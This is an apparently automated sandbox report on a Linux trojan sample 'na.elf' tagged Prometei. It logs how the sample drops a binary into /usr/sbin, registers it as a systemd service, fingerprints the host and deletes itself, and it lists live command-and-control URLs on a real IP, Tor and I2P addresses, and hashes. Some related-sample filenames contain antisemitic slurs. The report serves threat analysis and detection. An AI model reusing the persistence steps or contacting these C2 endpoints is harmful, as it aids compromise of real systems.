      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/233/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/233/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/1699/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/1699/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/113/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/113/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/234/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/234/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/1335/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/1335/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/1698/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/1698/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/114/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/114/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/235/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/235/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/1334/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/1334/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/1576/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/1576/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/2302/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/2302/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/115/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/115/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/236/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/236/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/116/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/116/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/237/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/237/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/117/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/117/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/118/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/118/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/910/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/910/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/119/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/119/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/912/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/912/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/4725/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/4725/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/10/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/10/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/2307/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/2307/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/11/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/11/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/918/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/918/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/12/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/12/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/13/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/13/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/14/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/14/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/15/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/15/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/16/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/16/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/17/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/17/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/18/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/18/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/1594/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/1594/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/120/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/120/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/121/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/121/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/1349/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/1349/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/1/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/1/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/122/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/122/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/243/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/243/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/123/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/123/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/2/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/2/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/124/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/124/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/3/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/3/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/4/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/4/cmdlineJump to behavior
      Source: /tmp/na.elf (PID: 6211)Shell command executed: sh -c "pgrep na.elf"Jump to behavior
      Source: /tmp/na.elf (PID: 6215)Shell command executed: sh -c "pgrep uplugplay"Jump to behavior
      Source: /tmp/na.elf (PID: 6219)Shell command executed: sh -c "pidof uplugplay"Jump to behavior
      Source: /tmp/na.elf (PID: 6225)Shell command executed: sh -c "pgrep upnpsetup"Jump to behavior
      Source: /tmp/na.elf (PID: 6229)Shell command executed: sh -c "pidof upnpsetup"Jump to behavior
      Source: /tmp/na.elf (PID: 6233)Shell command executed: sh -c "systemctl daemon-reload"Jump to behavior
      Source: /tmp/na.elf (PID: 6248)Shell command executed: sh -c "systemctl enable uplugplay.service"Jump to behavior
      Source: /tmp/na.elf (PID: 6253)Shell command executed: sh -c "systemctl start uplugplay.service"Jump to behavior
      Source: /usr/sbin/uplugplay (PID: 6258)Shell command executed: sh -c "/usr/sbin/uplugplay -Dcomsvc"Jump to behavior
      Source: /usr/sbin/uplugplay (PID: 6263)Shell command executed: sh -c hostnamectlJump to behavior
      Source: /usr/sbin/uplugplay (PID: 6267)Shell command executed: sh -c hostnamectlJump to behavior
      Source: /usr/sbin/uplugplay (PID: 6413)Shell command executed: sh -c "dmidecode --type baseboard"Jump to behavior
      Source: /usr/sbin/uplugplay (PID: 6417)Shell command executed: sh -c uptimeJump to behavior
      Source: /usr/sbin/uplugplay (PID: 6424)Shell command executed: sh -c dmidecodeJump to behavior
      Source: /usr/sbin/uplugplay (PID: 6430)Shell command executed: sh -c "uname -a"Jump to behavior
      Source: /usr/sbin/uplugplay (PID: 6436)Shell command executed: sh -c uptimeJump to behavior
      Source: /usr/sbin/uplugplay (PID: 6440)Shell command executed: sh -c "uname -a"Jump to behavior
      Source: /bin/sh (PID: 6212)Pgrep executable: /usr/bin/pgrep -> pgrep na.elfJump to behavior
      Source: /bin/sh (PID: 6216)Pgrep executable: /usr/bin/pgrep -> pgrep uplugplayJump to behavior
      Source: /bin/sh (PID: 6226)Pgrep executable: /usr/bin/pgrep -> pgrep upnpsetupJump to behavior
      Source: /usr/bin/dash (PID: 6472)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.wGWDQF8lGk /tmp/tmp.fcWJ0ImgwV /tmp/tmp.Llo4sBnTUTJump to behavior
      Source: /usr/bin/dash (PID: 6473)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.wGWDQF8lGk /tmp/tmp.fcWJ0ImgwV /tmp/tmp.Llo4sBnTUTJump to behavior
      Source: /bin/sh (PID: 6234)Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reloadJump to behavior
      Source: /bin/sh (PID: 6249)Systemctl executable: /usr/bin/systemctl -> systemctl enable uplugplay.serviceJump to behavior
      Source: /bin/sh (PID: 6254)Systemctl executable: /usr/bin/systemctl -> systemctl start uplugplay.serviceJump to behavior
      Source: /usr/sbin/uplugplay (PID: 6259)Reads from proc file: /proc/statJump to behavior
      Source: /usr/sbin/uplugplay (PID: 6259)Reads from proc file: /proc/cpuinfoJump to behavior
      Source: /usr/sbin/uplugplay (PID: 6259)Reads from proc file: /proc/meminfoJump to behavior
      Source: /tmp/na.elf (PID: 6208)File: /usr/sbin/uplugplay (bits: -v usr: x grp: x all: r)Jump to behavior
      Source: /tmp/na.elf (PID: 6208)File written: /usr/sbin/uplugplayJump to dropped file
      Source: submitted sampleStderr: Created symlink /etc/systemd/system/multi-user.target.wants/uplugplay.service /lib/systemd/system/uplugplay.service.: exit code = 0

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: /tmp/na.elf (PID: 6208)File: /usr/sbin/uplugplayJump to dropped file
      Source: /bin/sh (PID: 6414)Dmidecode executable: /usr/sbin/dmidecode dmidecode --type baseboardJump to behavior
      Source: /bin/sh (PID: 6425)Dmidecode executable: /usr/sbin/dmidecode dmidecodeJump to behavior
      Source: /tmp/na.elf (PID: 6208)File: /tmp/na.elfJump to behavior
      Source: na.elfSubmission file: segment LOAD with 7.6054 entropy (max. 8.0)
      Source: na.elfSubmission file: segment LOAD with 7.943 entropy (max. 8.0)
      Source: uplugplay.12.drDropped file: segment LOAD with 7.6054 entropy (max. 8.0)
      Source: uplugplay.12.drDropped file: segment LOAD with 7.943 entropy (max. 8.0)
      Source: /usr/sbin/uplugplay (PID: 6259)Reads CPU info from proc file: /proc/cpuinfoJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6216)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6226)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
      Source: /usr/sbin/uplugplay (PID: 6259)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
      Source: /usr/bin/uptime (PID: 6420)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
      Source: /usr/bin/uptime (PID: 6437)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
      Source: /tmp/na.elf (PID: 6208)Queries kernel information via 'uname': Jump to behavior
      Source: /usr/sbin/uplugplay (PID: 6255)Queries kernel information via 'uname': Jump to behavior
      Source: /usr/sbin/uplugplay (PID: 6259)Queries kernel information via 'uname': Jump to behavior
      Source: /usr/bin/uname (PID: 6431)Queries kernel information via 'uname': Jump to behavior
      Source: /usr/bin/uname (PID: 6441)Queries kernel information via 'uname': Jump to behavior
      Source: /lib/systemd/systemd-hostnamed (PID: 6269)Queries kernel information via 'uname': Jump to behavior
      Source: /usr/bin/gpg (PID: 6408)Queries kernel information via 'uname': Jump to behavior
      Source: /usr/bin/gpg (PID: 6419)Queries kernel information via 'uname': Jump to behavior
      Source: /usr/bin/gpg (PID: 6427)Queries kernel information via 'uname': Jump to behavior
      Source: /usr/bin/gpg (PID: 6433)Queries kernel information via 'uname': Jump to behavior

      Language, Device and Operating System Detection

      barindex
      Source: /bin/sh (PID: 6414)Dmidecode executable: /usr/sbin/dmidecode dmidecode --type baseboardJump to behavior
      Source: /bin/sh (PID: 6425)Dmidecode executable: /usr/sbin/dmidecode dmidecodeJump to behavior
      Source: /bin/sh (PID: 6431)Uname executable: /usr/bin/uname -> uname -aJump to behavior
      Source: /bin/sh (PID: 6441)Uname executable: /usr/bin/uname -> uname -aJump to behavior
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information1
      Scripting
      Valid AccountsWindows Management Instrumentation1
      Systemd Service
      1
      Systemd Service
      1
      Masquerading
      1
      OS Credential Dumping
      1
      Security Software Discovery
      Remote ServicesData from Local System1
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/Job1
      Scripting
      Boot or Logon Initialization Scripts1
      File and Directory Permissions Modification
      LSASS Memory14
      System Information Discovery
      Remote Desktop ProtocolData from Removable Media1
      Ingress Tool Transfer
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
      Hidden Files and Directories
      Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
      Obfuscated Files or Information
      NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
      File Deletion
      LSA SecretsInternet Connection DiscoverySSHKeylogging1
      Proxy
      Scheduled TransferData Encrypted for Impact
      No configs have been found
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Number of created Files
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1652674 Sample: na.elf Startdate: 31/03/2025 Architecture: LINUX Score: 100 77 152.36.128.18, 58304, 58306, 80 NCRENUS United States 2->77 79 109.202.202.202, 80 INIT7CH Switzerland 2->79 81 5 other IPs or domains 2->81 83 Suricata IDS alerts for network traffic 2->83 85 Malicious sample detected (through community Yara rule) 2->85 87 Antivirus detection for dropped file 2->87 89 4 other signatures 2->89 11 systemd uplugplay 2->11         started        13 na.elf 2->13         started        17 systemd snapd-env-generator 2->17         started        19 9 other processes 2->19 signatures3 process4 file5 21 uplugplay 11->21         started        73 /usr/sbin/uplugplay, ELF 13->73 dropped 93 Found Tor onion address 13->93 95 Drops files in suspicious directories 13->95 97 Sample deletes itself 13->97 23 na.elf sh 13->23         started        25 na.elf sh 13->25         started        27 na.elf sh 13->27         started        29 5 other processes 13->29 signatures6 process7 process8 31 uplugplay sh 21->31         started        33 sh pgrep 23->33         started        35 sh pgrep 25->35         started        37 sh pidof 27->37         started        39 sh pgrep 29->39         started        41 sh pidof 29->41         started        43 sh systemctl 29->43         started        45 2 other processes 29->45 process9 47 sh uplugplay 31->47         started        file10 75 /etc/CommId, ASCII 47->75 dropped 50 uplugplay sh 47->50         started        52 uplugplay sh 47->52         started        54 uplugplay sh 47->54         started        56 5 other processes 47->56 process11 process12 58 sh dmidecode 50->58         started        61 sh dmidecode 52->61         started        63 sh hostnamectl 54->63         started        65 sh hostnamectl 56->65         started        67 sh uptime 56->67         started        69 sh uname 56->69         started        71 2 other processes 56->71 signatures13 91 Executes the "dmidecode" command for reading DMI BIOS info like hardware or serial numbers (indicative of machine fingerprinting or VM-detection) 58->91
      SourceDetectionScannerLabelLink
      na.elf47%ReversingLabsLinux.Trojan.Generic
      na.elf100%AviraLINUX/GM.Agent.JQ
      SourceDetectionScannerLabelLink
      /usr/sbin/uplugplay100%AviraLINUX/GM.Agent.JQ
      /usr/sbin/uplugplay47%ReversingLabsLinux.Trojan.Generic
      No Antivirus matches
      SourceDetectionScannerLabelLink
      http://152.36.128.18/cgi-bin/p.cgi?r=22&i=162XYDVI8U344LH4100%Avira URL Cloudmalware

      Download Network PCAP: filteredfull

      NameIPActiveMaliciousAntivirus DetectionReputation
      xinchaodbcfda.com
      unknown
      unknownfalse
        high
        NameMaliciousAntivirus DetectionReputation
        http://152.36.128.18/cgi-bin/p.cgi?r=22&i=162XYDVI8U344LH4true
        • Avira URL Cloud: malware
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        http://152.36.128.18/cgi-bin/p.cgihttp://dummy.zero/cgi-bin/prometei.cgihttps://gb7ni5rgeexdcncj.onina.elf, 6208.1.000000000052d000.0000000001575000.rw-.sdmpfalse
          high
          http://upx.sf.netna.elf, uplugplay.12.drfalse
            high
            http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgina.elf, 6208.1.000000000052d000.0000000001575000.rw-.sdmpfalse
              high
              https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgina.elf, 6208.1.000000000052d000.0000000001575000.rw-.sdmpfalse
                high
                http://152.36.128.18/cgi-bin/p.cgina.elf, 6208.1.000000000052d000.0000000001575000.rw-.sdmpfalse
                  high
                  http://dummy.zero/cgi-bin/prometei.cgina.elf, 6208.1.000000000052d000.0000000001575000.rw-.sdmpfalse
                    high
                    http://152.36.128na.elf, uplugplay.12.drfalse
                      high
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      54.171.230.55
                      unknownUnited States
                      16509AMAZON-02USfalse
                      199.232.90.49
                      unknownUnited States
                      54113FASTLYUSfalse
                      152.36.128.18
                      unknownUnited States
                      81NCRENUStrue
                      109.202.202.202
                      unknownSwitzerland
                      13030INIT7CHfalse
                      91.189.91.43
                      unknownUnited Kingdom
                      41231CANONICAL-ASGBfalse
                      91.189.91.42
                      unknownUnited Kingdom
                      41231CANONICAL-ASGBfalse
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      54.171.230.55Mozi.m.elfGet hashmaliciousUnknownBrowse
                        na.elfGet hashmaliciousPrometeiBrowse
                          na.elfGet hashmaliciousPrometeiBrowse
                            na.elfGet hashmaliciousPrometeiBrowse
                              na.elfGet hashmaliciousPrometeiBrowse
                                na.elfGet hashmaliciousPrometeiBrowse
                                  na.elfGet hashmaliciousPrometeiBrowse
                                    fuckjewishpeople.i686.elfGet hashmaliciousGafgyt, MiraiBrowse
                                      fuckjewishpeople.mips.elfGet hashmaliciousGafgyt, MiraiBrowse
                                        fuckjewishpeople.mpsl.elfGet hashmaliciousGafgyt, MiraiBrowse
                                          199.232.90.49na.elfGet hashmaliciousPrometeiBrowse
                                            na.elfGet hashmaliciousPrometeiBrowse
                                              miori.arm7.elfGet hashmaliciousUnknownBrowse
                                                na.elfGet hashmaliciousPrometeiBrowse
                                                  miori.arm5.elfGet hashmaliciousUnknownBrowse
                                                    Mozi.a.elfGet hashmaliciousUnknownBrowse
                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                        na.elfGet hashmaliciousPrometeiBrowse
                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                              152.36.128.18na.elfGet hashmaliciousPrometeiBrowse
                                                              • 152.36.128.18/cgi-bin/p.cgi?r=13&i=8711V51Q45KM5B9L
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 152.36.128.18/cgi-bin/p.cgi?r=4&i=213U6SANKFY6LBV1
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 152.36.128.18/cgi-bin/p.cgi?r=31&i=8LCN4KQ5FG8UGTSN
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 152.36.128.18/cgi-bin/p.cgi?r=7&i=02ZQF59YO97QSN16
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 152.36.128.18/cgi-bin/p.cgi?r=18&i=3590ZZ6L7CIM03B1
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 152.36.128.18/cgi-bin/p.cgi?r=13&i=080ZX3RN6S3YO8YV
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 152.36.128.18/cgi-bin/p.cgi?r=24&i=ITO34I304D6614V4
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 152.36.128.18/cgi-bin/p.cgi?r=13&i=U040325A779G7J6U
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 152.36.128.18/cgi-bin/p.cgi?r=8&i=X2Q9G3G42P689U7H
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 152.36.128.18/cgi-bin/p.cgi?r=13&i=893Y835P0515575G
                                                              No context
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              AMAZON-02USMozi.m.elfGet hashmaliciousUnknownBrowse
                                                              • 54.171.230.55
                                                              https://www.canva.com/design/DAGjR3xjHjQ/Jz3hsdYd1wfGuO7V0r6_Zw/view?utm_content=DAGjR3xjHjQ&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=h5790724d57Get hashmaliciousUnknownBrowse
                                                              • 18.238.4.43
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 54.171.230.55
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 34.243.160.129
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 54.171.230.55
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 34.249.145.219
                                                              boatnet.arm6.elfGet hashmaliciousMiraiBrowse
                                                              • 34.249.145.219
                                                              HSBC-COPY-INT-WIRE_USD18,794.67 Deposit 35%.exeGet hashmaliciousFormBookBrowse
                                                              • 13.248.169.48
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 52.26.80.133
                                                              https://www.notion.so/loginwithemail?state%3Dv02%253Atemp_password%253AoMxvN1rDtJtCsgmtOezqMfwaMgP0Mi85Ztuq46xjKGwCLHja2k5SSVVFts0UZYrOcRv_CMCqmbA1CScbU-5b-N_gG0m3QbS2OxpSa0yi50-ycbev4dugfPfBEvCTxo9iBUYryzJkxnekptut2ZBzY7DzlNI3EVfOIHa9bfsc9hLlIG7HffWNvxq7rb6S4i3L_9RVB0XX-0_kCGUesHr7CDC0oRMVDAByZYgYcq-_NJYYCFuBxQ%26redirectUrl%3D%252F4a4146f9bfe14aef8476d79d45fc399e%26password%3D738380%26isSignup%3Dfalse%26isMicrosoft%3DfalseGet hashmaliciousUnknownBrowse
                                                              • 13.35.93.28
                                                              INIT7CHMozi.m.elfGet hashmaliciousUnknownBrowse
                                                              • 109.202.202.202
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 109.202.202.202
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 109.202.202.202
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 109.202.202.202
                                                              boatnet.ppc.elfGet hashmaliciousMiraiBrowse
                                                              • 109.202.202.202
                                                              boatnet.arm6.elfGet hashmaliciousMiraiBrowse
                                                              • 109.202.202.202
                                                              boatnet.arm.elfGet hashmaliciousMiraiBrowse
                                                              • 109.202.202.202
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 109.202.202.202
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 109.202.202.202
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 109.202.202.202
                                                              FASTLYUSna.elfGet hashmaliciousPrometeiBrowse
                                                              • 199.232.90.49
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 199.232.38.49
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 199.232.38.49
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 199.232.90.49
                                                              https://get-razzed.online/krcGet hashmaliciousHTMLPhisherBrowse
                                                              • 151.101.130.137
                                                              https://www.notion.so/loginwithemail?state%3Dv02%253Atemp_password%253AoMxvN1rDtJtCsgmtOezqMfwaMgP0Mi85Ztuq46xjKGwCLHja2k5SSVVFts0UZYrOcRv_CMCqmbA1CScbU-5b-N_gG0m3QbS2OxpSa0yi50-ycbev4dugfPfBEvCTxo9iBUYryzJkxnekptut2ZBzY7DzlNI3EVfOIHa9bfsc9hLlIG7HffWNvxq7rb6S4i3L_9RVB0XX-0_kCGUesHr7CDC0oRMVDAByZYgYcq-_NJYYCFuBxQ%26redirectUrl%3D%252F4a4146f9bfe14aef8476d79d45fc399e%26password%3D738380%26isSignup%3Dfalse%26isMicrosoft%3DfalseGet hashmaliciousUnknownBrowse
                                                              • 151.101.45.140
                                                              fuckjewishpeople.m68k.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                              • 151.101.46.49
                                                              fuckjewishpeople.mips.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                              • 151.101.46.49
                                                              https://posit.co/download/rstudio-desktop/Get hashmaliciousUnknownBrowse
                                                              • 23.185.0.4
                                                              Execution.mpsl.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                              • 199.232.38.49
                                                              NCRENUSna.elfGet hashmaliciousPrometeiBrowse
                                                              • 152.36.128.18
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 152.36.128.18
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 152.36.128.18
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 152.36.128.18
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 152.36.128.18
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 152.36.128.18
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 152.36.128.18
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 152.36.128.18
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 152.36.128.18
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 152.36.128.18
                                                              No context
                                                              No context
                                                              Process:/usr/sbin/uplugplay
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):16
                                                              Entropy (8bit):3.702819531114783
                                                              Encrypted:false
                                                              SSDEEP:3:KX+AFptR:KttR
                                                              MD5:25BA6C8DE6C2746679EDAFECBEBDBE6A
                                                              SHA1:6161DE845012808358A2D5EA777054C021846DC5
                                                              SHA-256:C643340039806AD5D0966CC6A54E4CD5350AA40A5C8EEB8A84353E1704B4385F
                                                              SHA-512:55DAF58AD9B5B0FEDF4D86853E17B5724079358E09FFFC6FB9A4D5274694618E5FBF9697E96CDC70EEE0D86171C89C370CFFC24A64BCC9F1D5A8CC9445637323
                                                              Malicious:true
                                                              Reputation:low
                                                              Preview:162XYDVI8U344LH4
                                                              Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):76
                                                              Entropy (8bit):3.7627880354948586
                                                              Encrypted:false
                                                              SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                                                              MD5:D86A1F5765F37989EB0EC3837AD13ECC
                                                              SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                                                              SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                                                              SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                                                              Malicious:false
                                                              Reputation:high, very likely benign file
                                                              Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
                                                              Process:/tmp/na.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):145
                                                              Entropy (8bit):4.769509838572339
                                                              Encrypted:false
                                                              SSDEEP:3:zMZa75X1PxQJqtWA1+DRvBADMikAdIgQ+aQmNJX4ev+sirSkQmWA1+DRvn:z8uXcqtWA4RZAMD+aBNdhTILQmWA4Rv
